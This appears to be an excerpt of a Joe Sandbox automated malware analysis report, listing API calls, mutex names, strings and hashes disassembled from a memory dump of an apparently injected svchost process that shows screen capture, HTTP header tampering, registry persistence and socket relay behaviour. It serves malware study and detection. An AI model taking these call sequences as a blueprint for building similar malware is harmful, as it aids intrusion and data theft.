                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCurrentHandleModuleProcProcessVersionmemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            • API String ID: 877405840-3024904723
                                                                                                                                                                                                            • Opcode ID: 2d8e0a6a8fff08f23e0aad92f46895f996e6a680ca94b2f21621046ed013eb6d
                                                                                                                                                                                                            • Instruction ID: ab2509dac45ebc24982450debd88eb51baa31cac6808634e6fc844e1ce05eae6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d8e0a6a8fff08f23e0aad92f46895f996e6a680ca94b2f21621046ed013eb6d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F316B30A80119ABDF39EE55C895BF973B9EF4630CF5085A9D50697340EB719B90CA81
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GdiFlush.GDI32(?,?,?), ref: 02C77926
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C77934
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,?), ref: 02C7794A
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(00000000,?), ref: 02C77956
                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,?), ref: 02C77963
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C77985
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 3485819771-465009422
                                                                                                                                                                                                            • Opcode ID: 8171cd07da8917a43439a99d2a7210e13dec6fc51a1ddb171d100cc1c6730262
                                                                                                                                                                                                            • Instruction ID: 724dfa19468e913fa4ed040b0bc688f067e8746fae3b6580ec2c130846e12548
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8171cd07da8917a43439a99d2a7210e13dec6fc51a1ddb171d100cc1c6730262
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE31CA32E411099BCB15CF69D984BAABBB5EFC8354F2885A9EC04D7305D730E955CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C7AB2F
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7AB54
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7AB62
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32 ref: 02C7AB97
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7AB9E
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7ABAE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 1675675969-465009422
                                                                                                                                                                                                            • Opcode ID: d5d136a4041b7d436f771182aacef41972af81b25510e3df2a3fb617409e179f
                                                                                                                                                                                                            • Instruction ID: 03f074cc63b41d1f3aab212351704ecd20f5acd8214eb696ac11eda72c1c52d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5d136a4041b7d436f771182aacef41972af81b25510e3df2a3fb617409e179f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35012431A81250AFCB029B24FC08FDE33A4BF84724F050BF5E8448B282D7B5A9428BC0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C7A9AD
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A9CB
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32 ref: 02C7AA00
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7AA07
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7AA1B
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000005), ref: 02C7AA2A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentErrorLastMessageMutexObjectReleaseSendSingleThreadWaitWindow
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 699575883-465009422
                                                                                                                                                                                                            • Opcode ID: b27bce4fcbca707674da6cca9773a2ca59ec8251dd11a3a9c0c98df92576ddb6
                                                                                                                                                                                                            • Instruction ID: b57c32ef7cd3355056b50e60d3a575415a9a353647a6e2fe4b6cb4813c133737
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b27bce4fcbca707674da6cca9773a2ca59ec8251dd11a3a9c0c98df92576ddb6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75014B349C0240AFE7169B20E84DBDA37A4FB98716F054BA8F5198B2D1CBB556A1CF90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9028E
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C9029F
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C902A6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C902B8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C902C9
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • P0Wu, xrefs: 02C902A6
                                                                                                                                                                                                            • Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}, xrefs: 02C90285
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutex$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                            • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Wu
                                                                                                                                                                                                            • API String ID: 1893094850-1214925433
                                                                                                                                                                                                            • Opcode ID: f06f6f68b692b4df80c7d7f822048cac3a6d39cf8352ce90042cfbb9e9ac5f45
                                                                                                                                                                                                            • Instruction ID: 7b5619f72061de97dfb8ba50d1b1332e428a752ab455fde5046a9974113a088f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f06f6f68b692b4df80c7d7f822048cac3a6d39cf8352ce90042cfbb9e9ac5f45
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DF0A730D826A4B7E7125BA09C0DBAE7A9CDF45B15F0046C0F805D3181D7B0861046A1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02C8A39E
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C8A3AF
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8A3B6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A3C8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8A3D9
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}, xrefs: 02C8A395
                                                                                                                                                                                                            • P0Wu, xrefs: 02C8A3B6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutex$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                            • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}$P0Wu
                                                                                                                                                                                                            • API String ID: 1893094850-3712121269
                                                                                                                                                                                                            • Opcode ID: a5663edb95a2c72d152053f0210cd614263555c4a7ddfa9d3fc34966fc3c5894
                                                                                                                                                                                                            • Instruction ID: 4841972f98751e0d98693809ac7c433629e7ee9a812505941e5fca44fe9b3815
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5663edb95a2c72d152053f0210cd614263555c4a7ddfa9d3fc34966fc3c5894
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8F0EC31D81294F7E7125B94DC0DB9E7B5CDF0570AF004281FD0993180E7F08E1487A1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 02C776E8
                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 02C77708
                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 02C77711
                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 02C7771D
                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 02C77752
                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C77771
                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 02C77793
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 02C777A1
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object$CompatibleCreateDeleteSelect$BitmapRelease
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2733039346-0
                                                                                                                                                                                                            • Opcode ID: 2bb2ac571cb401fe6b4c9584210e2ad626184bbe85346ab9c2802dc2599c5a24
                                                                                                                                                                                                            • Instruction ID: bfb34221d478f6acdaabe61e514b240ef0dadb0fc3b9fac8cb4bf5e66dc91265
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bb2ac571cb401fe6b4c9584210e2ad626184bbe85346ab9c2802dc2599c5a24
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55110075D81240AFC74ADB68F488FA67BF8EB8D310B154A95F40AC3301D734A8658F60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsWindowVisible.USER32(02C7C29D), ref: 02C7BB2F
                                                                                                                                                                                                            • GetWindowInfo.USER32(02C7C29D,?), ref: 02C7BB49
                                                                                                                                                                                                            • GetClassLongA.USER32(02C7C29D,000000E6), ref: 02C7BB9E
                                                                                                                                                                                                            • PrintWindow.USER32(02C7C29D,?,00000000), ref: 02C7BBB7
                                                                                                                                                                                                            • BitBlt.GDI32(02C7BD82,?,?,?,?,76C1BCB0,00000000,00000000,00CC0020), ref: 02C7BC5E
                                                                                                                                                                                                              • Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96
                                                                                                                                                                                                              • Part of subcall function 02C7B950: SendMessageA.USER32(?,?,00000004,00000000), ref: 02C7B978
                                                                                                                                                                                                              • Part of subcall function 02C7B950: GdiFlush.GDI32(00000000,?,755730D0,?,?,?,02C7843E), ref: 02C7B98E
                                                                                                                                                                                                              • Part of subcall function 02C7B950: BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 02C7B9B4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            • API String ID: 2334662925-4251816714
                                                                                                                                                                                                            • Opcode ID: e4894afa2bf716a42caf37b7b11bc8e27eb5ceb2ea965b2bbc33eb65ace83cf7
                                                                                                                                                                                                            • Instruction ID: 093ccc57ffc1fd99d080eff7a680f8aef94a22716c52aaadbc85895ac9ea315c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4894afa2bf716a42caf37b7b11bc8e27eb5ceb2ea965b2bbc33eb65ace83cf7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08413C71E00519AFCB15CF58C985AAEFBBABF84308F148259E405A7644DB30BE52CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FBD3
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FBFF
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FC26
                                                                                                                                                                                                            • HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 02C7FC6C
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02C7FC7F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$HeadersHttpRequest
                                                                                                                                                                                                            • String ID: Accept-Encoding:
                                                                                                                                                                                                            • API String ID: 853579731-3444961765
                                                                                                                                                                                                            • Opcode ID: eae1558d97f0c1907df676c8d2acc288414731bcd5932755705afb8cacad6815
                                                                                                                                                                                                            • Instruction ID: a1939f19b0903ae485086d7e66a7c0367de7593c3fc979b1ec14221293d3a2c0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: eae1558d97f0c1907df676c8d2acc288414731bcd5932755705afb8cacad6815
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F31FFB1D4121DAFDB50DFA5D885AEEBBB9FF88310F114569ED15E7200D3749A018FA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC0F
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC3B
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC62
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02C7AC91
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,92f35800a), ref: 02C7ACA7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                            • String ID: 92f35800a
                                                                                                                                                                                                            • API String ID: 410342393-1413308398
                                                                                                                                                                                                            • Opcode ID: 35ea4937242a902a5c5d0cf1d59a717b5ec3b164cb4c847174ea150e8905d255
                                                                                                                                                                                                            • Instruction ID: 50cd088300e2c098ad6a19424ca14a86222806e7c165223fdedc0b517644ca9f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35ea4937242a902a5c5d0cf1d59a717b5ec3b164cb4c847174ea150e8905d255
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C31E1B1E40209EFDB40CFA9D885AEEBBF9FB48300F10856AE514E7240E7755A40CF90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8A9F7
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8B260,02CC7DA0,00000000,00000000), ref: 02C8AA90
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8AAA8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8AAB9
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$BackslashCloseCreateInformationPathThread
                                                                                                                                                                                                            • String ID: 6D1DA3E6$keys
                                                                                                                                                                                                            • API String ID: 3186380484-1107829881
                                                                                                                                                                                                            • Opcode ID: 2771d991d4f445e0f8a9d88fa8f6d17c7ff2f7c90c2fbd5c1e4154789060f2d3
                                                                                                                                                                                                            • Instruction ID: 31663a969f21679a839c96e740fe0cc2cd9ff88a966b516aecd0452d6e46079d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2771d991d4f445e0f8a9d88fa8f6d17c7ff2f7c90c2fbd5c1e4154789060f2d3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE214D319851455BDB22DB7499187FEB7E4DF49308F2881D9E845E7240EB71CE09CF90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C93194
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F
                                                                                                                                                                                                            • Process32First.KERNEL32 ref: 02C931C5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,?), ref: 02C931E0
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,?), ref: 02C931EC
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93208
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C9321A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3955875343-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(02C84ADF,software\microsoft,00000000,00000102,80000002,?,?,?,?,00000000,0000000A), ref: 02C76F4D
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(80000002,92f35f97a,00000000,00000001,?,00000104,?,?,?,?,00000000,0000000A), ref: 02C76F6F
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02C76F8A
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02C76F9F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFlushOpenValue
                                                                                                                                                                                                            • String ID: 92f35f97a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2510291871-3066206799
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 02C883CB
                                                                                                                                                                                                            • shutdown.WS2_32(02C884AC,00000001), ref: 02C883D0
                                                                                                                                                                                                            • recv.WS2_32(02C884AC,?,00000400,00000000), ref: 02C883EF
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000400,00000000), ref: 02C88405
                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 02C88419
                                                                                                                                                                                                            • closesocket.WS2_32(02C884AC), ref: 02C8841C
                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 02C88420
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1638183600-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,00000000,02C89113,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8913C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89146
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8914D
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8915E
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C891AA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocMutexObjectProcessReleaseSingleWaitmemset
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 819421891-465009422
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • free.MSVCRT ref: 02C9C81F
                                                                                                                                                                                                            • MoveFileA.KERNEL32(?,?), ref: 02C9CA0D
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C9CA51
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C9CAC3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$AttributesCreateDirectoryMovefree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1026147201-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 02C8810E
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C8813F
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C8816B
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C88192
